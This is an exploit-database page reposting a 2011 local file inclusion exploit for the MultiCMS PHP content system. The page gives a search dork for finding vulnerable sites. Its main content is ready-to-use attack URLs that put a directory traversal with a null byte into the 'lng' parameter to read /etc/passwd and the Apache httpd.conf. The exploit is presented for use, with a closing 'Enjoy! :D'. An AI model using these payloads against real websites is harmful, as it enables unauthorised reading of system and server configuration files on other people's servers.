[] NeoSense
E X P L O I T S
title author type platform port cve id

MultiCMS - Local File Inclusion

Author: R3VAN_BASTARD
type: webapps
platform: php
port: 
date_added: 2011-01-29 
date_updated: 2011-01-29 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
Source: http://packetstormsecurity.org/files/view/97987/multicms-lfi.txt

=============================www[dot]Whiteponny[dot]com=============================
# Date: 29/01/2011
# Author: R3VAN_BASTARD
# Exploit Title: MultiCMS File Inclusion Vulnerbility
# Vendor: http://www.multicms.net
# Status: FIXED
# Tested on: Windows 7
# Dork: "Redakcní systém MultiCMS"
# Mail: defrontliner@whiteponny.com
================================================================================
# File: /Index.php?lng=[LFI]
# XPL: http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/passwd%00
           http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00

Enjoy! :D
================================================================================
Thanks To: Madonk "Makasih udah nemenin Scan :D"
                 S3T4N a.k.a Zeth.
                 All My Friends
=============================www[dot]Whiteponny[dot]com=============================
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.